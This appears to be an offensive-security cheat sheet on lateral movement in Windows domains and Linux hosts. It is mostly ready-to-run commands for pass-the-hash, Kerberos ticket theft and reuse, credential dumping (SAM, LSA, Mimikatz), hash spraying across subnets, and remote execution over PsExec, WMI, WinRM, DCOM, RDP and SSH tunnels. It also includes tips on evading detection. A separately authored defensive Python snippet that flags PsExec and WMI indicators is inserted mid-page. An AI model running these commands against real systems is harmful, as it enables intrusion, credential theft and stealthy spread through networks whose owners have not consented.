Exploitation

Lateral Movement

Move through the network using captured credentials, hashes, and tickets to access additional systems.

Tool Installation

Tool           Purpose                  Install
Impacket       PsExec, WMIExec, etc.    pip install impacket
Evil-WinRM     WinRM shell              gem install evil-winrm
CrackMapExec   Swiss army knife         github.com/byt3bl33d3r
Mimikatz       Credential extraction    github.com/gentilkiwi

Pass-the-Hash (PtH)

Use NTLM hashes directly without knowing the plaintext password. Works with local admin accounts and domain accounts.

Hash Format:

  • LM:NTLM - Full format, 32 hex characters on each side (e.g., aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0)
  • :NTLM - NTLM only (LM is often empty)
  • Empty LM hash: aad3b435b51404eeaad3b435b51404ee

Warning

Local Admin Required: PtH to SMB requires local administrator privileges on the target. Domain user hashes won't work unless the user is a local admin.

CrackMapExec PtH

bash
# Execute command with hash
crackmapexec smb TARGET -u Administrator -H 'LM:NTLM' -x 'whoami'

# Just NTLM hash (common)
crackmapexec smb TARGET -u Administrator -H ':31d6cfe0d16ae931b73c59d7e0c089c0' -x 'whoami'

# Spray hash across network (find where admin creds work)
crackmapexec smb 192.168.1.0/24 -u Administrator -H 'HASH' --local-auth

# Check if user is local admin (Pwn3d!)
crackmapexec smb 192.168.1.0/24 -u Administrator -H 'HASH'

# Dump SAM hashes with PtH
crackmapexec smb TARGET -u Administrator -H 'HASH' --sam

# Dump LSA secrets
crackmapexec smb TARGET -u Administrator -H 'HASH' --lsa

# Execute PowerShell
crackmapexec smb TARGET -u Administrator -H 'HASH' -X 'Get-Process'

Impacket PtH

Impacket provides multiple execution methods with different stealth/detection tradeoffs.

bash
# PsExec - Creates service, interactive shell
psexec.py -hashes :NTLM_HASH Administrator@TARGET

# WMIExec - Stealthier, semi-interactive
wmiexec.py -hashes :NTLM_HASH Administrator@TARGET

# SMBExec - Uses named pipes
smbexec.py -hashes :NTLM_HASH Administrator@TARGET

# AtExec - Uses Task Scheduler (non-interactive)
atexec.py -hashes :NTLM_HASH Administrator@TARGET 'whoami > C:\output.txt'

# DCOMExec - Uses DCOM objects
dcomexec.py -hashes :NTLM_HASH Administrator@TARGET

# Full hash format also works (LM and NT halves are each 32 hex characters)
psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0' Administrator@TARGET

Mimikatz PtH / Overpass-the-Hash

Overpass-the-Hash converts NTLM hash to a Kerberos ticket, allowing pass-the-hash to Kerberos-only services.

text
# Overpass-the-hash - spawns new process with Kerberos ticket
mimikatz# sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:powershell.exe

# The new PowerShell window has Administrator's Kerberos ticket
# Verify with: klist

# Access resources
dir \\target.corp.local\c$

# You can also use AES keys
mimikatz# sekurlsa::pth /user:Administrator /domain:corp.local /aes256:AES_KEY /run:cmd.exe

# Classic PtH (NTLM only, deprecated)
mimikatz# sekurlsa::pth /user:Administrator /domain:. /ntlm:HASH /run:cmd.exe

Pass-the-Ticket (PtT)

Use stolen Kerberos tickets to authenticate. Works even when NTLM is disabled.

Ticket Formats:

  • .kirbi - Windows format (Mimikatz, Rubeus)
  • .ccache - Linux format (Impacket)
  • Base64 - Rubeus output format
  • Convert between formats with ticketConverter.py

Export and Import Tickets

text
# Export tickets with Mimikatz (saves all tickets to .kirbi files)
mimikatz# sekurlsa::tickets /export

# Export specific ticket
mimikatz# kerberos::list /export

# Import ticket
mimikatz# kerberos::ptt ticket.kirbi

# Rubeus - dump all tickets (Base64 format)
Rubeus.exe dump /nowrap
Rubeus.exe dump /service:krbtgt /nowrap  # Just TGTs

# Rubeus - import ticket from Base64
Rubeus.exe ptt /ticket:BASE64_TICKET_STRING

# Rubeus - import from file
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify ticket loaded (Windows)
klist

Impacket with Kerberos

bash
# Convert kirbi to ccache format
ticketConverter.py ticket.kirbi ticket.ccache

# Convert ccache to kirbi
ticketConverter.py ticket.ccache ticket.kirbi

# Set environment variable to use ccache
export KRB5CCNAME=/path/to/ticket.ccache

# Use any Impacket tool with Kerberos (-k flag, -no-pass)
psexec.py -k -no-pass corp.local/Administrator@target.corp.local
wmiexec.py -k -no-pass corp.local/Administrator@target.corp.local
secretsdump.py -k -no-pass target.corp.local
smbclient.py -k -no-pass corp.local/Administrator@target.corp.local

# IMPORTANT: Use FQDN (target.corp.local), not IP address!
# Kerberos requires matching hostname in ticket

Warning

DNS Required: When using Kerberos, you must resolve hostnames. Add DC to /etc/hosts or configure DNS. Use FQDNs, not IP addresses.

Remote Execution Methods

Different methods have different requirements, detection signatures, and capabilities.

PsExec

Creates a service on the remote system. Noisy but reliable.

bash
# Impacket PsExec (creates PSEXESVC service)
psexec.py corp.local/Administrator:Password123@TARGET
psexec.py corp.local/Administrator:Password123@TARGET 'cmd.exe /c whoami'

# Sysinternals PsExec
PsExec.exe \\TARGET -u corp\Administrator -p Password123 cmd.exe
PsExec.exe \\TARGET -u corp\Administrator -p Password123 -s cmd.exe  # SYSTEM

# CrackMapExec (tries multiple methods)
crackmapexec smb TARGET -u Administrator -p Password123 -x 'whoami'
crackmapexec smb TARGET -u Administrator -p Password123 -x 'whoami' --exec-method smbexec

Detection Indicators:

  • Service creation event (Event ID 7045)
  • File write to ADMIN$ share
  • Named pipe connections

WMI Execution

WMI is stealthier - no service created, uses existing WMI infrastructure.

bash
# Impacket WMIExec (semi-interactive shell)
wmiexec.py corp.local/Administrator:Password123@TARGET
wmiexec.py -hashes :NTLM_HASH Administrator@TARGET

# PowerShell WMI
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c whoami > C:\output.txt' -ComputerName TARGET -Credential $cred

# Read output
Get-Content \\TARGET\c$\output.txt

# CIM (modern WMI)
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine='calc.exe'} -ComputerName TARGET -Credential $cred

# wmic command line (deprecated but still works)
wmic /node:TARGET /user:Administrator /password:Password123 process call create 'cmd.exe /c whoami'
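An added detection example from the defender's side (my code, not from the page or any tool it lists): a triage pass over constructed Windows System 7045 and Sysmon records that flags the three PsExec indicators listed above, plus the WMI case, which leaves no service or file drop but does leave cmd.exe with WmiPrvSE.exe as its parent. Sysmon 17 (pipe created) and Sysmon 1 (process create) are the real event IDs; the host names and records are constructed.

```python
import re

# Constructed sample telemetry (not real logs): Windows System 7045 (service
# installed), Sysmon 17 (pipe created) and Sysmon 1 (process create) records.
EVENTS = [
    {"src": "System", "id": 7045, "host": "FS01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"src": "System", "id": 7045, "host": "FS01", "ServiceName": "WdNisSvc",
     "ImagePath": r"C:\Program Files\Windows Defender\NisSrv.exe"},
    {"src": "System", "id": 7045, "host": "WS07", "ServiceName": "kXqL",
     "ImagePath": r"\\127.0.0.1\ADMIN$\kXqLwPmz.exe"},
    {"src": "Sysmon", "id": 17, "host": "FS01", "PipeName": r"\PSEXESVC"},
    {"src": "Sysmon", "id": 17, "host": "FS01", "PipeName": r"\srvsvc"},
    {"src": "Sysmon", "id": 1, "host": "WS07", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /c whoami > C:\output.txt"},
    {"src": "Sysmon", "id": 1, "host": "WS07", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe"},
]

# A service binary referenced through the ADMIN$ share, e.g. \\host\ADMIN$\x.exe
ADMIN_SHARE = re.compile(r"\\\\[^\\]+\\ADMIN\$\\", re.IGNORECASE)


def triage(events):
    """Return (host, reason) findings for the lateral-movement indicators above."""
    findings = []
    for e in events:
        if e["src"] == "System" and e["id"] == 7045:
            if e["ServiceName"].upper() == "PSEXESVC":
                findings.append((e["host"], "PsExec service installed (PSEXESVC)"))
            elif ADMIN_SHARE.search(e["ImagePath"]):
                findings.append((e["host"], f"service {e['ServiceName']} runs from ADMIN$"))
        elif e["src"] == "Sysmon" and e["id"] == 17:
            if "PSEXESVC" in e["PipeName"].upper():
                findings.append((e["host"], "PsExec control pipe created"))
        elif e["src"] == "Sysmon" and e["id"] == 1:
            # Win32_Process.Create over WMI runs under WmiPrvSE.exe: no service,
            # no file drop, but the parent process gives it away.
            if e["ParentImage"].lower().endswith(r"\wmiprvse.exe"):
                findings.append((e["host"], "process spawned by WmiPrvSE: " + e["CommandLine"]))
    return findings
```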

WinRM (Evil-WinRM)

WinRM provides encrypted PowerShell remoting. Port 5985 (HTTP) or 5986 (HTTPS).

bash
# Evil-WinRM with password
evil-winrm -i TARGET -u Administrator -p 'Password123'

# Evil-WinRM with hash (PtH)
evil-winrm -i TARGET -u Administrator -H 'NTLM_HASH'

# Evil-WinRM with Kerberos ticket
evil-winrm -i target.corp.local -r corp.local

# Evil-WinRM features
menu                    # Show all features
upload /local/file      # Upload file
download C:\file        # Download file
services                # List services

# PowerShell remoting
$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred

# Invoke-Command for mass execution
Invoke-Command -ComputerName server1,server2,server3 -Credential $cred -ScriptBlock { whoami; hostname }

# Check if WinRM is enabled
Test-WSMan -ComputerName TARGET

Tip

Enable WinRM: If WinRM is disabled but you have admin access via SMB, you can enable it remotely with: crackmapexec smb TARGET -u admin -p pass -M winrm -o ACTION=enable

DCOM Execution

DCOM is less monitored and often overlooked by defenders.

bash
# Impacket DCOMExec (uses MMC20 by default)
dcomexec.py corp.local/Administrator:Password123@TARGET
dcomexec.py -hashes :NTLM_HASH Administrator@TARGET

# Different DCOM objects
dcomexec.py corp.local/Administrator:Password123@TARGET 'whoami' -object ShellBrowserWindow
dcomexec.py corp.local/Administrator:Password123@TARGET 'whoami' -object ShellWindows
dcomexec.py corp.local/Administrator:Password123@TARGET 'whoami' -object MMC20

RDP Access

Full GUI access. Note: may disconnect the currently logged-on user's session and is heavily logged.

bash
# Enable RDP via registry (if you have admin)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Firewall rule for RDP
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

# Add user to Remote Desktop Users group
net localgroup "Remote Desktop Users" username /add

# RDP with xfreerdp (Linux)
xfreerdp /u:Administrator /p:Password123 /v:TARGET /cert-ignore
xfreerdp /u:corp\\Administrator /p:Password123 /v:TARGET /cert-ignore  # Domain user

# RDP Pass-the-Hash (Restricted Admin Mode required)
xfreerdp /u:Administrator /pth:NTLM_HASH /v:TARGET /cert-ignore

# Enable Restricted Admin Mode (on target)
reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

# RDP with rdesktop
rdesktop -u Administrator -p Password123 TARGET

# SharpRDP (command execution via RDP without full GUI)
SharpRDP.exe computername=TARGET command="whoami" username=Administrator password=Password123

Warning

Restricted Admin Mode: Required for RDP PtH. When enabled, credentials aren't sent to the remote machine (helps prevent credential theft but allows PtH).

SSH (Linux Targets)

For Linux systems or Windows with OpenSSH installed.

bash
# SSH with password
ssh user@TARGET

# SSH with key (the key file must not be group- or world-readable)
chmod 600 id_rsa  # Fix permissions if needed
ssh -i id_rsa user@TARGET

# SSH tunneling for lateral movement
# Local port forward (access internal service from attacker)
ssh -L 8080:internal-host:80 user@pivot-host
# Now access http://localhost:8080 to reach internal-host:80

# SOCKS proxy (tunnel all traffic)
ssh -D 9050 user@pivot-host
# Use with proxychains

# Remote port forward (expose attacker service to internal network)
ssh -R 8080:localhost:80 user@pivot-host

# SSH with password (avoid interactive prompt)
sshpass -p 'password' ssh user@TARGET

# Execute command without interactive shell
ssh user@TARGET 'whoami; id; cat /etc/passwd'

Lateral Movement Cheat Sheet

Method    Port       Pros                      Cons
PsExec    445        Interactive shell         Creates service, noisy
WMIExec   135        Stealthier, no service    Semi-interactive
WinRM     5985/5986  Native, encrypted         Must be enabled
DCOM      135        Often overlooked          Non-interactive
RDP       3389       Full GUI access           Kicks off user, logged

Tip

WMIExec is generally the stealthiest option as it doesn't create services or write files. Use it when trying to avoid detection.

External Resources